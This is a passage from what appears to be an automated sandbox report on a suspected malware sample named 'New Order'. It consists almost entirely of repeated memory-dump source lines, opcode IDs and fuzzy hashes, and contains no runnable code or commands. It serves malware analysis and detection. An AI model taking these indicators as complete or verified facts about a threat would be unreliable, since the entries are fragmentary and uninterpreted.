                                                                                                                              • Instruction Fuzzy Hash: 8501B57260415577EB259B5DC804B9B7F68EBC0B50F394015EA06DB280E674DB84C3F1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                              • Instruction ID: edf7cb7681aa361362e19c3de68b4cd9a20729ba72984c7e3b49936273947525
                                                                                                                              • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                              • Instruction Fuzzy Hash: 2F0128322002148BEF52CA1DDC84B52776BFFC4714F5545A5ED45CF286DAB1CE81C390
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ca149c8651bdb9d241638ff316a1df675e385093c304a8b7145a3dacfc910d0c
                                                                                                                              • Instruction ID: eab0227004a211ba0b4aa8fa08b16bc968c78274be75df7870dcd1188936d31e
                                                                                                                              • Opcode Fuzzy Hash: ca149c8651bdb9d241638ff316a1df675e385093c304a8b7145a3dacfc910d0c
                                                                                                                              • Instruction Fuzzy Hash: 4011177790011DABCB12EB98CC80DDFBB7CEF48358F044166A906E7211EA34AB15CBE1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 776a3dae80ecac19a122d1354bc242dc989f879a8861ae81dcad34a887cbbd14
                                                                                                                              • Instruction ID: 174b8504d3d83ed8c66038be4bfc5cc994fa7ab67b18e7fc8d575cd77c87adb4
                                                                                                                              • Opcode Fuzzy Hash: 776a3dae80ecac19a122d1354bc242dc989f879a8861ae81dcad34a887cbbd14
                                                                                                                              • Instruction Fuzzy Hash: 2811A1766441469FDB11CF58D800BA6BBB9FB9A314F1D8159F848CB315E732ED81CBA0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: ebe65e9669814cab6915ae30ee279826264dd22a7ccb275dd9da0f0b511c24ec
                                                                                                                              • Instruction ID: 1199cff6d8107ec94190484e24b15b2429232379fa2b104641b4f61082c6e782
                                                                                                                              • Opcode Fuzzy Hash: ebe65e9669814cab6915ae30ee279826264dd22a7ccb275dd9da0f0b511c24ec
                                                                                                                              • Instruction Fuzzy Hash: 0D014F71A0025D9BDB04DFA9D445AEEBBF8FF58314F14405AE905E7280EB74EB01CB95
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                              • Instruction ID: e3ba69fd3be968e9209cd2d44656c38baecff098c868abed509de99a4f09a7f8
                                                                                                                              • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                              • Instruction Fuzzy Hash: 4AF0127220001DBFEF029F98DD80DAF7B7DFB55398B204125FA11D2160E631DE21A7A0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: afddcd8f2ee9abd27d52520f8171eb45f2a181b23dc2712b7e8fbbac6f77e10e
                                                                                                                              • Instruction ID: ab21053a75e0b1e9fee0a756863fe884b3346777d5aa290761032bcbc92eca8e
                                                                                                                              • Opcode Fuzzy Hash: afddcd8f2ee9abd27d52520f8171eb45f2a181b23dc2712b7e8fbbac6f77e10e
                                                                                                                              • Instruction Fuzzy Hash: 83018936100149ABCF12AE88D840EDA3F66FB4C764F058116FE18A6260C336DAB0EF91
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 17e014bb7695a48747077189e67f76f6ef1db7094288a6653dbb380f20000547
                                                                                                                              • Instruction ID: cb4b12a0a21c6b6c620fa8f807f7f8307a74ed27f3dd78896ac0bcdadd6807e0
                                                                                                                              • Opcode Fuzzy Hash: 17e014bb7695a48747077189e67f76f6ef1db7094288a6653dbb380f20000547
                                                                                                                              • Instruction Fuzzy Hash: B9F02BB12042495BF356951D8C01F23B2AAE7C0754FB5807DEB058B3C1FA71DC1183A5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: cbf3e2789b2f9449366b739104bf9b1c57dace49faa0ef3ff2ce0c1bb55280a4
                                                                                                                              • Instruction ID: 5760cdf0aaf6c7bb2889342d5075094735664afa14beb57458d1391ab01dcc26
                                                                                                                              • Opcode Fuzzy Hash: cbf3e2789b2f9449366b739104bf9b1c57dace49faa0ef3ff2ce0c1bb55280a4
                                                                                                                              • Instruction Fuzzy Hash: 0301A470305685EBE322AB6CCD48F253BA9BB80B04F5801A4BA15DB6D6E728D7018621
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                              • Instruction ID: 79307dc28da84dbd81a628fce33d393506385dd1a96d89ee0aaef7d680f257ef
                                                                                                                              • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                              • Instruction Fuzzy Hash: FCF0BE36341A1347FF36AA2E8820F2FAA95AF90B01B4D452C9701CB680DFA0DA048791
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5b68732047824c74e23c6dedb469928befef73357a92cee8d2635a240fd3feee
                                                                                                                              • Instruction ID: 8263d7c72be27777e3a26be97c0f49a3404a682837cefd35aa45f44a14fe2624
                                                                                                                              • Opcode Fuzzy Hash: 5b68732047824c74e23c6dedb469928befef73357a92cee8d2635a240fd3feee
                                                                                                                              • Instruction Fuzzy Hash: 96F0AF716193089FC310EF68C441A1AB7E4FF98714F80465ABC98DB394EA34EA00CB96
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                              • Instruction ID: 50019c138f585666e514ce002170ac783669d93318d4763b2f95a417484cf28c
                                                                                                                              • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                              • Instruction Fuzzy Hash: C2F082337256229BE331AA4ECC80F1AB7A8EFD5B60F190065AA04DB264C760ED01C7D0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                              • Instruction ID: c50ffdaa2d8e69c378ffbe1c6d7c8a792063c53277aa0e9441fdb46fc22ef15d
                                                                                                                              • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                              • Instruction Fuzzy Hash: 87F0B472614204AFE714DF25CC05F56B6E9EFE8344F188078AA45D7264FAB0DE01C694
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4f5ed9a31cc03a12517ee802cc08bdfd042ed66dc823db68979c934a6cf6ff51
                                                                                                                              • Instruction ID: 0dfd6370299495307dc79a6b58538d439fd37e321c632dfb2d023aa5c97d6d8c
                                                                                                                              • Opcode Fuzzy Hash: 4f5ed9a31cc03a12517ee802cc08bdfd042ed66dc823db68979c934a6cf6ff51
                                                                                                                              • Instruction Fuzzy Hash: C3F04F70A0124D9FCB04EFA9C515A9EB7B4EF18304F10805AB955EB385DA38EB01CB65
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a1c8135be5ef06a9ca61923b5ab7194f6cd148cc1079ee93230a3e7e2f818f6b
                                                                                                                              • Instruction ID: 8c4e3b7d500fabe56c742b08e6b459b922c90480c501e4368df5c0bdaed89f83
                                                                                                                              • Opcode Fuzzy Hash: a1c8135be5ef06a9ca61923b5ab7194f6cd148cc1079ee93230a3e7e2f818f6b
                                                                                                                              • Instruction Fuzzy Hash: 95F0F0719862DC9EE7A38B2CC804B21BBD49B08725F084C6AC789C3582C7A0DB80C611
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2c5e31ff7707414a08b9062473e0b9e3c6a8e032f3c15aeb243ecc35ae5a91aa
                                                                                                                              • Instruction ID: 61490b3ac7fdae6d6a818f77c6ce5e28559c26970875ce5e069f4a0259fc093e
                                                                                                                              • Opcode Fuzzy Hash: 2c5e31ff7707414a08b9062473e0b9e3c6a8e032f3c15aeb243ecc35ae5a91aa
                                                                                                                              • Instruction Fuzzy Hash: 66F0272A516A8086CF325B2C68907D5AB54E781B50F29114ED9A0D7306E578C783CB21
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5409087c610923569d1ecfd2c27b1240386f0d981bae312b5fcdc36fe1ecdb8b
                                                                                                                              • Instruction ID: 9d1e05f104e1818094bf8a5da35b25dda0106a72e2804225917b97779330c6db
                                                                                                                              • Opcode Fuzzy Hash: 5409087c610923569d1ecfd2c27b1240386f0d981bae312b5fcdc36fe1ecdb8b
                                                                                                                              • Instruction Fuzzy Hash: A4F052714012809FEB22876CC408B11BBE89B807A4F0C982FC402D3522E720EA80DAD1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                              • Instruction ID: dea38223d81a9030c3e2799aa883fdf6a07f0126b0911190512c0b6f3d070b60
                                                                                                                              • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 93871fe1fb314e441b830c64be9405218d5a3b9ff3c78cd9b6dd628238697d82
                                                                                                                              • Instruction ID: 0dd7aeaf7d58245c8294d31b0f391d3d48bb2d7bfab3089cb93c317783ee46e1
                                                                                                                              • Opcode Fuzzy Hash: 93871fe1fb314e441b830c64be9405218d5a3b9ff3c78cd9b6dd628238697d82
                                                                                                                              • Instruction Fuzzy Hash: 14E092321009589BC322BB2DDD01F8A779AEF60360F114529B115971A0CB34AA10C785
                                                                                                                              • Instruction Fuzzy Hash: 04D012371D054DBBCB119F66DC01F957BA9E764BA0F444020B904C75A0D63AE950D584
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c87b622b9e7ece6a4236543d5b1188b2b64cedcdf17742a516e45eca64655ec6
                                                                                                                              • Instruction ID: 16329d031b68b93dc2a27f99636a4f04e1124e951bc974d9d0770472d2c28bc3
                                                                                                                              • Opcode Fuzzy Hash: c87b622b9e7ece6a4236543d5b1188b2b64cedcdf17742a516e45eca64655ec6
                                                                                                                              • Instruction Fuzzy Hash: 53D05230A010028BDF2BEB08CA54E2A3AB4FB50740B44006CEB00E2020E328DA028A80
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                              • Instruction ID: 863ef163e531ddc87b6d8c0843eb524d570e0816851fc5b7c10b6203c4764527
                                                                                                                              • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                              • Instruction Fuzzy Hash: 2CC01233290648AFC712AA99CD01F027BA9EBA8B50F000021F6048B670D631E920EA84
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                              • Instruction ID: ee1e5bf76feb05525783333f431e2b6d8002ac4286a9cef1114af0290c110af6
                                                                                                                              • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                              • Instruction Fuzzy Hash: EFD01236100248EFCB02DF45C890D9A772AFBD8710F108019FD19076108A31ED62DA90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                              • Instruction ID: cbd8389e54cd17c3163537c45779d0b0a1fecf3235d4763f0c353d17e22f3cd0
                                                                                                                              • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                              • Instruction Fuzzy Hash: B5C04C757115418FCF15DB1DD694F4577E4F744750F150890EC45DB721E624EE01CA11
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                                                                              • Instruction ID: e86634a0331b6ad52d701efc0d57a07a6289415047713d6898c0649a006b31e1
                                                                                                                              • Opcode Fuzzy Hash: 648f2a62eeaad2cdbbcd5344c2cdf0ddb4d308a711b0010c13bd86b66eb1983f
                                                                                                                              • Instruction Fuzzy Hash: 20B01232212545CFC7036724CB00B2873AAFF027C0F0900F0A500C9830D6198A50E502
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 246c41ed2df89e7a6f15387f6c252fb73f2126af861df583670b33a950bc1b0e
                                                                                                                              • Instruction ID: 23857437874b18a8845298264832937a45c5393e3aae5b5049e10103c7140954
                                                                                                                              • Opcode Fuzzy Hash: 246c41ed2df89e7a6f15387f6c252fb73f2126af861df583670b33a950bc1b0e
                                                                                                                              • Instruction Fuzzy Hash: A1900231605800169281715948845464405E7E1301B55C012F5428554CCA148B5A5762
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0bf596c4c18848064149a6f2b720205f005c3a05a0c14f49bf49d36222411a41
                                                                                                                              • Instruction ID: 1404b28afba4cd06a7c393d276f8215ea5b64dec7a202d7e661414a199ea56b2
                                                                                                                              • Opcode Fuzzy Hash: 0bf596c4c18848064149a6f2b720205f005c3a05a0c14f49bf49d36222411a41
                                                                                                                              • Instruction Fuzzy Hash: 38900261601500464281715948044066405E7E2301395C116B5558560CC6188A59976A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8295d407eb067837cbf252e8b443aa53b251f503f5fd021ea8f27f2380b9d80d
                                                                                                                              • Instruction ID: 28bed9b49cbb92b9c36dd0dca508420f6293f8a91d3671ed49e76b327a70ae72
                                                                                                                              • Opcode Fuzzy Hash: 8295d407eb067837cbf252e8b443aa53b251f503f5fd021ea8f27f2380b9d80d
                                                                                                                              • Instruction Fuzzy Hash: EE90023120140806D245715948046860405D7D1301F55C012BB028655ED6658A957632
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5f9c1f1ec590a3c16da6fc2d8916e79acf2178a69ac9a61c3866c2580a7f0c8f
                                                                                                                              • Instruction ID: 80d28288da1155b57856089337ad45fba3ecd85a368b2f21d2124fc41b0e22b2
                                                                                                                              • Opcode Fuzzy Hash: 5f9c1f1ec590a3c16da6fc2d8916e79acf2178a69ac9a61c3866c2580a7f0c8f
                                                                                                                              • Instruction Fuzzy Hash: 3F90023160540806D291715944147460405D7D1301F55C012B5028654DC7558B597BA2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 266c1f16f0619dac38c4bda706432192238fe4b62064d4a847d8c5d418013b10
                                                                                                                              • Instruction ID: 34e2bc5a2eacb2282acb1b8150ccbad0eafd2c2c20690a043f7f12956c12a723
                                                                                                                              • Opcode Fuzzy Hash: 266c1f16f0619dac38c4bda706432192238fe4b62064d4a847d8c5d418013b10
                                                                                                                              • Instruction Fuzzy Hash: BF90023120544846D28171594404A460415D7D1305F55C012B5068694DD6258F59BB62
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4c5c0784ca9f38f9fda3f9bc49957d011470c937f29b102a40e0cd09fabeca13
                                                                                                                              • Instruction ID: 1a1d405a3f665da32b08d53b294aa2da6dc3d7d6e1baf168a04d6ccfa7300a95
                                                                                                                              • Opcode Fuzzy Hash: 4c5c0784ca9f38f9fda3f9bc49957d011470c937f29b102a40e0cd09fabeca13
                                                                                                                              • Instruction Fuzzy Hash: DB90023120140806D2C17159440464A0405D7D2301F95C016B5029654DCA158B5D7BA2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: fd40e25678f7648d20e5085347f344da15e45569682ce50a160a128198632fe8
                                                                                                                              • Instruction ID: 910f314c9d9f4f02c8a6f8e55fe4a9a7a2c885ce4639be9fd4e456f3569f0ba6
                                                                                                                              • Opcode Fuzzy Hash: fd40e25678f7648d20e5085347f344da15e45569682ce50a160a128198632fe8
                                                                                                                              • Instruction Fuzzy Hash: 819002A1201540964641B2598404B0A4905D7E1301B55C017F6058560CC5258A559636
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d8d263281a3a63e68ce9a6c6aa2bdc4d06bf52a278ac309aa5182970b9db4d7d
                                                                                                                              • Instruction ID: 44f691dac0275605e9ac0f76beaef7923cf08b6f1041b091550e3ff3a02c626e
                                                                                                                              • Opcode Fuzzy Hash: d8d263281a3a63e68ce9a6c6aa2bdc4d06bf52a278ac309aa5182970b9db4d7d
                                                                                                                              • Instruction Fuzzy Hash: A3900225211400070246B55907045070446D7D6351355C022F6019550CD6218A655622
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              • Instruction Fuzzy Hash: F390022160140506D24271594404616040AD7D1341F95C023B6028555ECA258B96A632
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e9d914e6057b48da24ac797270427f615809036cfaae31d19b117cf85df21202
                                                                                                                              • Instruction ID: f1da57029ee4288736cdcb131633c19a191e459487d3a83dc3ae487355095595
